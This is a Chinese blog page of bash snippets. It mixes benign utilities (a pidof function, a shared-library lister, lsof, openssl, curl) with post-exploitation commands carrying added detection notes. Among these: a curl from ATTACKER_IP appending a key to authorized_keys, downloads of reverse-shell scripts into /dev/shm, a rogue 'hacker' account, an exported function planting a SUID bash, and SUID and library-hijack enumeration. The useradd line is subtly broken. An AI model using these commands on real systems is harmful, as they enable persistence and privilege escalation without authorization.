
纯 bash 实现

标签:certificate 实现 openssl echo process key lsof bash

pidof

#!/bin/sh

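#######################################
# Print the PIDs of every running process whose command name equals the
# given name, one per line (the behaviour of pidof(1)).
# Arguments: $1 - exact command name (the ps "comm" field; on Linux this is
#                 the kernel's 15-character name, so long names are truncated)
# Outputs:   matching PIDs on stdout; usage / not-found message on stderr
# Returns:   0 if at least one PID was printed, 1 otherwise
# Note: kept POSIX-sh compatible for the #!/bin/sh shebang — no arrays, no
#       [[ ]]. `local` is not in POSIX but dash/busybox/bash all accept it.
#######################################
pidof_process() {
    if [ $# -ne 1 ]; then
        echo "Usage: pidof_process <process_name>" >&2
        return 1
    fi

    local process_name="$1"
    local pids

    # Compare the command-name field exactly instead of grepping the whole
    # `ps aux` line: the argument is no longer treated as a regex, cannot
    # match its own grep or unrelated argv text, and the original array
    # assignment (a bashism under /bin/sh) is gone. This shell ($$) is
    # excluded so that looking up "sh"/"bash" does not return the script.
    # Limitation: command names that contain spaces are not matched.
    pids=$(ps -eo pid=,comm= | awk -v name="$process_name" -v self="$$" \
        '$2 == name && $1 != self { print $1 }')

    if [ -n "$pids" ]; then
        # printf rather than echo: prints every line of $pids, not just the
        # first element the original array/echo combination showed.
        printf '%s\n' "$pids"
    else
        echo "Process $process_name not found." >&2
        return 1
    fi
}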

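# Entry point: exactly one argument is required. The original printed the
# usage text but then called the function anyway; exit here instead, and
# let the function's status (non-zero when nothing matched) become the
# script's status so callers can test it.
if [ $# -ne 1 ]; then
    echo "Usage: pidof_process <process_name>" >&2
    exit 1
fi

# Quoted so a name containing spaces or glob characters is passed intact.
pidof_process "$1"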

通过 pid 获取进程加载的动态库

#!/bin/bash

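#######################################
# List the shared objects mapped into a running process, one path per line.
# Arguments: $1 - PID (decimal digits only)
# Outputs:   sorted, de-duplicated library paths on stdout; errors on stderr
# Returns:   0 on success; 1 for a malformed PID or a missing /proc entry;
#            awk's non-zero status if /proc/<pid>/maps cannot be read
#            (another user's process without matching privileges)
#######################################
list_shared_libraries() {
    local pid="$1"

    # The value is spliced into a /proc path, so accept only a decimal PID:
    # "../x", globs or an empty string must never reach the filesystem.
    if [[ ! "$pid" =~ ^[0-9]+$ ]]; then
        echo "Invalid PID: '$pid' (expected digits)." >&2
        return 1
    fi

    local maps_file="/proc/$pid/maps"

    if [[ ! -e "$maps_file" ]]; then
        echo "Process with PID $pid not found." >&2
        return 1
    fi

    # Field 6 of a maps line is the backing file. Match names ending in
    # ".so" or containing ".so." (libc.so.6) on that field only, instead of
    # any line that merely contains ".so". Streaming straight into sort
    # avoids the word-splitting an intermediate array would apply to paths.
    # Limitation (as in the original): a path containing spaces is cut at
    # the first space and a trailing "(deleted)" marker is dropped.
    awk 'NF >= 6 && $6 ~ /\.so(\.|$)/ { print $6 }' "$maps_file" | sort -u
    # Report awk's status, not sort's (sort exits 0 even when awk could not
    # open the file, e.g. for another user's process).
    return "${PIPESTATUS[0]}"
}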

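# Entry point: a PID is required. Diagnostics go to stderr so that only
# library paths appear on stdout.
if [[ -z "$1" ]]; then
    echo "Usage: $0 <PID>" >&2
    exit 1
fi

# Stream the function's output directly instead of capturing it into an
# array (result=($(...))) and re-printing it: the array form word-splits
# any path containing whitespace and hides the function's exit status.
# The function's status becomes the script's status.
list_shared_libraries "$1"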

安装公钥

# Appends a public key fetched from a remote host to the current user's
# authorized_keys, giving the holder of the matching private key SSH access
# as this user. Detection/mitigation: watch ~/.ssh/authorized_keys for
# modification (file-integrity monitoring, auditd watch rules) and manage
# accepted keys centrally with sshd's AuthorizedKeysFile/AuthorizedKeysCommand
# rather than per-user files. ATTACKER_IP is a placeholder on the original
# page, not a real host.
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

下载文件到内存

#Download in RAM
# All three lines fetch a script over plain HTTP and place it under /dev/shm
# (a tmpfs mount). Mitigation: mounting /dev/shm with noexec,nosuid prevents
# direct execution from it. Detection: file-creation events under /dev/shm
# and outbound HTTP to non-standard ports (8000 here) are low-noise alert
# sources. 10.10.14.14 is the page's sample address. -O names the output
# file, whereas -P only selects the directory and keeps the remote name.
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py

lsof

#Files used by network processes
# Triage reference: which process holds which file or socket. Combine with a
# PID from ps/pidof when investigating an unknown listener. Information on
# other users' processes requires root.
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by network processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234 (-a ANDs the two filters)
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files used by processes bound to port 80
fuser -nv tcp 80 #Processes using TCP port 80, verbose (shows user and command)

useradd

# Creates a local account named "hacker" with a preset password hash.
# Detection/mitigation: alert on useradd/usermod execution and on changes to
# /etc/passwd, /etc/shadow and /etc/group (auditd, file-integrity monitoring),
# and periodically diff local accounts against an expected baseline.
# <Password> is a placeholder from the original page.
useradd -p 'openssl passwd -1 <Password>' hacker  

http server

# Ad-hoc file servers that expose the current directory to every host that
# can reach the port. SimpleHTTPServer is Python 2 only (http.server on
# Python 3); binding port 80 needs root. Limit exposure by binding to a
# single interface (e.g. python3 -m http.server --bind ADDR) and stopping
# the server as soon as the transfer is done. $ip must be set before the
# php line runs.
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

curl

#json data
# Secrets passed as command-line arguments are recorded in shell history and
# visible to other local users through ps; read them from a file instead
# (--data @file; -H @file on curl 7.55+). Both examples use plain http://,
# so the password and the token cross the network unencrypted — use https://
# wherever the endpoint offers it.
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

openssl

# Openssl
# Certificate and key reference. The private keys produced below
# (newuser.key, key.pem via -nodes, key.ssh) are written unencrypted: keep
# them mode 0600 and off shared hosts.
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate a certificate signing request (CSR) from a private key. Recommended to set the "Organization Name"(Fortune) and the "Common Name" ([email protected])
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create a self-signed certificate; -nodes leaves key.pem unencrypted
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only need to create a client certificate from a CA certificate and the CA key, you can do it using:
# (note: the resulting client.p12 bundles the CA's private key itself, so it must be protected like the CA key)
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Remove the passphrase from a PEM-encoded RSA key (prompts for it; key.ssh is written unencrypted)
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
# -k puts the passphrase on the command line (visible in ps and shell history);
# -pass stdin or -kfile avoids that. Cipher and key-derivation options must
# match those used for encryption: without -pbkdf2, openssl enc uses the
# legacy single-iteration EVP_BytesToKey derivation.
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz

sudo suid

sudo -l #Check commands you can execute with sudo (admins: review this output for each role too)
find / -perm -4000 2>/dev/null #Find all SUID binaries (compare against the distribution's expected list)

# The next two lines define a function whose name is an absolute path and
# export it, so a privileged bash script that calls /usr/sbin/service and
# imports functions from this environment runs the function instead of the
# real binary. Mitigation: keep sudo's env_reset and secure_path defaults,
# do not grant sudo/SUID rights to shell scripts, and rely on current bash
# releases, which restrict which function names are imported from the
# environment (confirm against the installed version). Detection: look for
# BASH_FUNC_*%% environment variables carrying path-like names.
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service #Then, when you call the suid binary, this function will be executed

# Lists the files a SUID binary tries to open. Because the kernel ignores the
# setuid bit for a ptraced process, the binary runs with the caller's
# privileges under strace. Missing or user-writable paths in this output are
# the misconfigurations an audit should fix. <SUID-BINARY> is a placeholder.
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

Shared Object Hijacking

# Let's find a SUID using a non-standard library
# ldd may run the binary's dynamic loader on it; for an untrusted binary
# prefer "objdump -p" or "readelf -d" (below), which only parse the headers.
ldd some_suid
# sample ldd output line, not a command:
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
# Audit point: a RUNPATH/RPATH in a privileged binary that names a directory
# writable by unprivileged users. Fix the directory's ownership/permissions
# (root-owned, not group- or world-writable) or rebuild the binary without
# that RUNPATH; check /etc/ld.so.conf.d entries for the same problem.
readelf -d payroll  | grep PATH
# sample readelf output line, not a command:
0x000000000000001d (RUNPATH)            Library runpath: [/development]

gen passwd

# Generate password hashes in crypt(3) format (the form /etc/shadow and
# useradd -p expect). -1 ("$1$") is MD5-crypt, a legacy scheme; use SHA-512
# ("$6$") instead — openssl passwd -6 (OpenSSL 1.1.1+) or mkpasswd -m SHA-512.
# The salt here ("hacker", "salt") is fixed; real hashes need a random salt.
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
# Python 2 syntax (print statement). Python 3's crypt module is deprecated
# since 3.11 and removed in 3.13.
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Script/Binaries in PATH

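#######################################
# Print every *.sh file found under a ':'-separated list of directories.
# Arguments: $1 - directory list, defaults to $PATH
# Outputs:   matching paths on stdout; unreadable directories are skipped
#######################################
list_path_scripts() {
    local -a dirs
    # Split on ':' with IFS instead of `echo $PATH | tr`: no subshell, and
    # each entry is later used quoted, so directories containing spaces or
    # glob characters are passed to find intact (the original's backticks and
    # unquoted $d word-split and glob-expanded them).
    IFS=: read -r -a dirs <<< "${1:-$PATH}"
    local d
    for d in "${dirs[@]}"; do
        # Empty entries were dropped by the original's word splitting; keep
        # that behaviour rather than letting find default to ".".
        [[ -n "$d" ]] || continue
        find "$d" -name "*.sh" 2>/dev/null
    done
}

#######################################
# Print every regular, executable file under a ':'-separated directory list.
# Arguments: $1 - directory list, defaults to $PATH
# Outputs:   matching paths on stdout (-executable is a GNU find predicate)
#######################################
list_path_executables() {
    local -a dirs
    IFS=: read -r -a dirs <<< "${1:-$PATH}"
    local d
    for d in "${dirs[@]}"; do
        [[ -n "$d" ]] || continue
        find "$d" -type f -executable 2>/dev/null
    done
}

# Same two listings the original one-liners produced, over the real $PATH.
list_path_scripts
list_path_executables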

From: https://www.cnblogs.com/scriptk1d/p/18303114/bash-zyya1r
